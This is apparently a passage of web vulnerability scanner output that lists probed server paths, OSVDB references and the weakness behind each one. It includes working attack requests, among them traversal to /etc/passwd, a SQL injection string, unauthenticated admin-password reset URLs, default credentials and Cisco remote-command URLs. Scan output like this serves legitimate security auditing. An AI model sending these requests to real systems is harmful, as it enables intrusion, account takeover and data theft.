+ /cfdocs/snippets/evaluate.cfm: Can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info
+ /cfide/Administrator/startstop.html: Can start/stop the server
+ OSVDB-10598: /cd-cgi/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ /cgi-bin/handler: Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands
+ OSVDB-235: /cgi-bin/webdist.cgi: Comes with IRIX 5.0 - 6.3; allows to run arbitrary commands
+ OSVDB-55: /ews/ews/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. http://www.securityfocus.com/bid/2665.
+ OSVDB-5280: /instantwebmail/message.php: Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ /admin.php4?reg_login=1: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ OSVDB-3233: /admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-5178: /dostuff.php?action=modify_user: Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/
+ OSVDB-5088: /accounts/getuserdesc.asp: Hosting Controller 2002 administration page is available. This should be protected.
+ OSVDB-35876: /agentadmin.php: Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.
+ /sqldump.sql: Database SQL?
+ /structure.sql: Database SQL?
+ /servlet/SessionManager: IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.
+ /ip.txt: This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file.
+ /level/42/exec/show%20conf: Retrieved Cisco configuration file.
+ /livehelp/: LiveHelp may reveal system information.
+ /LiveHelp/: LiveHelp may reveal system information.
+ OSVDB-59536: /logicworks.ini: web-erp 0.1.4 and earlier allow .ini files to be read remotely.
+ /logs/str_err.log: Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries).
+ OSVDB-6465: /mall_log_files/order.log: EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details.
+ OSVDB-3204: /megabook/files/20/setup.db: Megabook guestbook configuration available remotely.
+ OSVDB-6161: /officescan/hotdownload/ofscan.ini: OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords.
+ /order/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /order/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /orders/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /Orders/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /orders/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /Orders/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /pmlite.php: A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details.
+ /session/admnlogin: SessionServlet Output, has session cookie info.
+ OSVDB-613: /SiteScope/htdocs/SiteScope.html: The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.
+ /servlet/allaire.jrun.ssi.SSIFilter: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call, see MPSB01-12 http://www.macromedia.com/devnet/security/security_zone/mpsb01-12.html.
+ OSVDB-2881: /pp.php?action=login: Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.
+ /isapi/count.pl?: AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.
+ /krysalis/: Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot
+ /logjam/showhits.php: Logjam may possibly allow remote command execution via showhits.php page.
+ /manual.php: Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.
+ OSVDB-14329: /smssend.php: PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php
+ OSVDB-113: /ncl_items.html: This may allow attackers to reconfigure your Tektronix printer.
+ OSVDB-551: /ncl_items.shtml?SUBJECT=1: This may allow attackers to reconfigure your Tektronix printer.
+ /photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ /photodata/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ OSVDB-5374: /pub/english.cgi?op=rmail: BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.
+ /pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
+ OSVDB-240: /scripts/wsisa.dll/WService=anything?WSMadmin: Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.
+ OSVDB-3092: /SetSecurity.shm: Cisco System's My Access for Wireless. This resource should be password protected.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-2225: /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
+ OSVDB-3092: /shopadmin.asp: VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.
+ OSVDB-3092: /_vti_txt/_vti_cnf/: FrontPage directory found.
+ OSVDB-3092: /_vti_txt/: FrontPage directory found.
+ OSVDB-3092: /_vti_pvt/deptodoc.btr: FrontPage file found. This may contain useful information.
+ OSVDB-3092: /_vti_pvt/doctodep.btr: FrontPage file found. This may contain useful information.
+ OSVDB-3092: /_vti_pvt/services.org: FrontPage file found. This may contain useful information.
+ OSVDB-28260: /_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611: Gives info about server settings. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0413, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0710, http://www.securityfocus.com/bid/1608, http://www.securityfocus.com/bid/1174.
+ OSVDB-28260: /_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611: Gives info about server settings.
+ OSVDB-3092: /_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false: We seem to have authoring access to the FrontPage web.
+ OSVDB-3092: /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false: We seem to have authoring access to the FrontPage web.
+ OSVDB-3092: /_vti_bin/_vti_aut/dvwssr.dll: This dll allows anyone with authoring privs to change other users file, and may contain a buffer overflow for unauthenticated users. See also : http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=1. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/MS00-025.
+ OSVDB-3092: /_vti_bin/_vti_aut/fp30reg.dll: Some versions of the FrontPage fp30reg.dll are vulnerable to a buffer overflow. See http://www.microsoft.com/technet/security/bulletin/https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-051.asp for details.
+ OSVDB-473: /_vti_pvt/access.cnf: Contains HTTP server-specific access control information. Remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/service.cnf: Contains meta-information about the web server Remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/services.cnf: Contains the list of subwebs. Remove or ACL if FrontPage is not being used. May reveal server version if Admin has changed it.
+ OSVDB-473: /_vti_pvt/svacl.cnf: File used to store whether subwebs have unique permissions settings and any IP address restrictions. Can be used to discover information about subwebs, remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/writeto.cnf: Contains information about form handler result files. Remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/linkinfo.cnf: IIS file shows http links on and off site. Might show host trust relationships and other machines on network.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-48: /doc: The /doc directory is browsable. This may be /usr/doc.
+ OSVDB-250: /cgis/wwwboard/wwwboard.cgi: Versions 2.0 Alpha and below have multiple problems. See http://www.securityfocus.com/bid/1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.
+ OSVDB-250: /cgis/wwwboard/wwwboard.pl: Versions 2.0 Alpha and below have multiple problems. See http://www.securityfocus.com/bid/1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.
+ OSVDB-376: /manager/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-376: /jk-manager/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-376: /jk-status/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-376: /host-manager/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-568: /blahb.ida: Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2001/MS01-033.
+ OSVDB-568: /blahb.idq: Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2001/MS01-033.
+ OSVDB-2117: /BACLIENT: IBM Tivoli default file found.
+ OSVDB-578: /level/16/exec/-///pwd: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec/-///show/configuration: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec/: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec//show/access-lists: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/configuration: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/interfaces: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/interfaces/status: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/version: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/running-config/interface/FastEthernet: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/17/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/18/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/19/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/20/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/21/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/22/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/23/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/24/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/25/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/26/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/27/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/28/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/29/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/30/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/31/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/32/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/33/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/34/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/35/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/36/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/37/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/38/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/39/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/40/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/41/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/42/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/43/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/44/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/45/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/46/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/47/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/48/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/49/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/50/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/51/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/52/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/53/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/54/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/55/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/56/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/57/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/58/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/59/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/60/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/61/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/62/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/63/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/64/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/65/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/66/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/67/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/68/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/69/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/70/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/71/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/72/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/73/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/74/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/75/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/76/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/77/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/78/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/79/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/80/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/81/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/82/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/83/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/84/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/85/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/86/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/87/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/88/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/89/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/90/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/91/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/92/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/93/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/94/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/95/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/96/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/97/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/98/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/99/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-18810: /users.lst: LocalWEB2000 users.lst passwords found
+ OSVDB-13405: /WS_FTP.LOG: WS_FTP.LOG file was found. It may contain sensitive information.
+ OSVDB-3715: /nsn/env.bas: Novell web server shows the server environment and is vulnerable to cross-site scripting
+ OSVDB-3722: /lcgi/lcgitest.nlm: Novell web server shows the server environment
+ OSVDB-13404: /com/: Novell web server allows directory listing
+ OSVDB-13402: /com/novell/: Novell web server allows directory listing
+ OSVDB-13403: /com/novell/webaccess: Novell web server allows directory listing
+ OSVDB-4804: //admin/admin.shtml: Axis network camera may allow admin bypass by using double-slashes before URLs.
+ OSVDB-4808: /axis-cgi/buffer/command.cgi: Axis WebCam 2400 may allow overwriting or creating files on the system. See http://www.websec.org/adv/axis2400.txt.html for details.
+ OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html
+ OSVDB-228: /upload.cgi+: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access to allowed sources.
+ OSVDB-1264: /publisher/: Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0237.
+ OSVDB-134: /cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd: Comes with IRIX 6.2-6.4; allows to run arbitrary commands
+ OSVDB-155: /counter/1/n/n/0/3/5/0/a/123.gif: The Roxen Counter may eat up excessive CPU time with image requests.
+ OSVDB-2: /iissamples/exair/search/search.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-2117: /cpanel/: Web-based control panel
+ OSVDB-2119: /shopping/diag_dbtest.asp: VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0560, http://www.securityfocus.com/bid/8159
+ OSVDB-250: /wwwboard/passwd.txt: The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version.
+ OSVDB-2695: /photo/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.
+ OSVDB-2695: /photodata/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.
+ OSVDB-272: /msadc/msadcs.dll: See RDS advisory RFP9902, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1011, https://docs.microsoft.com/en-us/security-updates/securitybulletins/2098/MS98-004, https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-025 RFP-9902 BID-29 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d1.htm), CIAC J-054 http://www.ciac.org/ciac/bulletins/j-054.shtml www.securityfocus.com/bid/529
+ OSVDB-2735: /musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-275: /scripts/tools/newdsn.exe: This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. http://www.securityfocus.com/bid/1818. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)
+ OSVDB-2813: /admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ OSVDB-284: /iisadmpwd/aexp2.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp2b.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp3.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp4.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp4b.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-2842: //admin/aindex.htm: FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt
+ OSVDB-2922: /admin/wg_user-info.ml: WebGate Web Eye exposes user names and passwords.
+ OSVDB-294: /c32web.exe/ChangeAdminPassword: This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.
+ OSVDB-2944: /showmail.pl: @Mail WebMail 3.52 allows attacker to read arbitrary user's mailbox. Requires knowing valid user name and appending ?Folder=../../victim@somehost.com/mbox/Inbox to the showmail.pl file.
+ OSVDB-2948: /reademail.pl: @Mail WebMail 3.52 contains an SQL injection that allows attacker to read any email message for any address registered in the system. Example to append to reademail.pl: ?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1
+ OSVDB-3: /iissamples/exair/search/query.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-3092: /buddies.blt: Buddy List?
+ OSVDB-3092: /buddy.blt: Buddy List?
+ OSVDB-3092: /buddylist.blt: Buddy List?
+ OSVDB-3092: /sqlnet.log: Oracle log file found.
+ OSVDB-3092: /acceso/: This might be interesting...
+ OSVDB-3092: /access-log: This might be interesting...
+ OSVDB-3092: /access.log: This might be interesting...
+ OSVDB-3092: /access/: This might be interesting...
+ OSVDB-3092: /access_log: This might be interesting...
+ OSVDB-3092: /acciones/: This might be interesting...
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3092: /accounting/: This might be interesting...
+ OSVDB-3092: /activex/: This might be interesting...
+ OSVDB-3092: /adm/: This might be interesting...
+ OSVDB-3092: /admin.htm: This might be interesting...
+ OSVDB-3092: /admin.html: This might be interesting...
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3092: /admin.php3: This might be interesting...
+ OSVDB-3092: /admin.shtml: This might be interesting...
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /Administration/: This might be interesting...
+ OSVDB-3092: /administration/: This might be interesting...
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /Admin_files/: This might be interesting...
+ OSVDB-3092: /advwebadmin/: This might be interesting...probably HostingController, www.hostingcontroller.com
+ OSVDB-3092: /Agent/: This might be interesting...
+ OSVDB-3092: /Agentes/: This might be interesting...
+ OSVDB-3092: /agentes/: This might be interesting...
+ OSVDB-3092: /Agents/: This might be interesting...
+ OSVDB-3092: /analog/: This might be interesting...
+ OSVDB-3092: /apache/: This might be interesting...
+ OSVDB-3092: /app/: This might be interesting...
+ OSVDB-3092: /applicattion/: This might be interesting...
+ OSVDB-3092: /applicattions/: This might be interesting...
+ OSVDB-3092: /apps/: This might be interesting...
+ OSVDB-3092: /archivar/: This might be interesting...
+ OSVDB-3092: /archive/: This might be interesting...
+ OSVDB-3092: /archives/: This might be interesting...
+ OSVDB-3092: /archivo/: This might be interesting...
+ OSVDB-3092: /asp/: This might be interesting...
+ OSVDB-3092: /Asp/: This might be interesting...
+ OSVDB-3092: /atc/: This might be interesting...
+ OSVDB-3092: /auth/: This might be interesting...
+ OSVDB-3092: /awebvisit.stat: This might be interesting...
+ OSVDB-3092: /ayuda/: This might be interesting...
+ OSVDB-3092: /backdoor/: This might be interesting...
+ OSVDB-3092: /backup/: This might be interesting...
+ OSVDB-3092: /bak/: This might be interesting...
+ OSVDB-3092: /banca/: This might be interesting...
+ OSVDB-3092: /banco/: This might be interesting...
+ OSVDB-3092: /bank/: This might be interesting...
+ OSVDB-3092: /bbv/: This might be interesting...
+ OSVDB-3092: /bdata/: This might be interesting...
+ OSVDB-3092: /bdatos/: This might be interesting...
+ OSVDB-3092: /beta/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /boot/: This might be interesting...
+ OSVDB-3092: /buy/: This might be interesting...
+ OSVDB-3092: /buynow/: This might be interesting...
+ OSVDB-3092: /c/: This might be interesting...
+ OSVDB-3092: /cache-stats/: This might be interesting...
+ OSVDB-3092: /caja/: This might be interesting...
+ OSVDB-3092: /card/: This might be interesting...
+ OSVDB-3092: /cards/: This might be interesting...
+ OSVDB-3092: /cart/: This might be interesting...
+ OSVDB-3092: /cash/: This might be interesting...
+ OSVDB-3092: /ccard/: This might be interesting...
+ OSVDB-3092: /ccbill/secure/ccbill.log: This might be interesting... CC Bill log file?
+ OSVDB-3092: /cdrom/: This might be interesting...
+ OSVDB-3092: /cert/: This might be interesting...
+ OSVDB-3092: /certificado/: This might be interesting...
+ OSVDB-3092: /certificate: This might be interesting...
+ OSVDB-3092: /certificates: This might be interesting...
+ OSVDB-3092: /cfdocs/exampleapp/email/application.cfm: This might be interesting...
+ OSVDB-3092: /cfdocs/exampleapp/publish/admin/addcontent.cfm: This might be interesting...
+ OSVDB-3092: /cfdocs/exampleapp/publish/admin/application.cfm: This might be interesting...
+ OSVDB-3092: /cfdocs/examples/httpclient/mainframeset.cfm: This might be interesting...
+ OSVDB-3092: /client/: This might be interesting...
+ OSVDB-3092: /cliente/: This might be interesting...
+ OSVDB-3092: /clientes/: This might be interesting...
+ OSVDB-3092: /clients/: This might be interesting...
+ OSVDB-3092: /communicator/: This might be interesting...
+ OSVDB-3092: /compra/: This might be interesting...
+ OSVDB-3092: /compras/: This might be interesting...
+ OSVDB-3092: /compressed/: This might be interesting...
+ OSVDB-3092: /conecta/: This might be interesting...
+ OSVDB-3092: /config/checks.txt: This might be interesting...
+ OSVDB-3092: /connect/: This might be interesting...
+ OSVDB-3092: /console: This might be interesting...
+ OSVDB-3092: /correo/: This might be interesting...
+ OSVDB-3092: /crypto/: This might be interesting...
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /cuenta/: This might be interesting...
+ OSVDB-3092: /cuentas/: This might be interesting...
+ OSVDB-3092: /dan_o.dat: This might be interesting...
+ OSVDB-3092: /dat/: This might be interesting...
+ OSVDB-3092: /data/: This might be interesting...
+ OSVDB-3092: /dato/: This might be interesting...
+ OSVDB-3092: /datos/: This might be interesting...
+ OSVDB-3092: /db/: This might be interesting...
+ OSVDB-3092: /dbase/: This might be interesting...
